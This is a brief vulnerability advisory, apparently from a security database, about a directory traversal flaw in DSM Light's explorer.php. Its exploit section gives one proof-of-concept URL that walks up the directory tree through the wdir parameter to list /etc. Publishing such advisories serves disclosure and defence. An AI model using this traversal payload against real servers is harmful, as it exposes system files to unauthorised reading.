• info
• discussion
• exploit
• solution
• references

DSM Light Explorer.EXE Directory Traversal Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/htmlarea/popups/explorer.php?wdir=/../../../../../../../../../../etc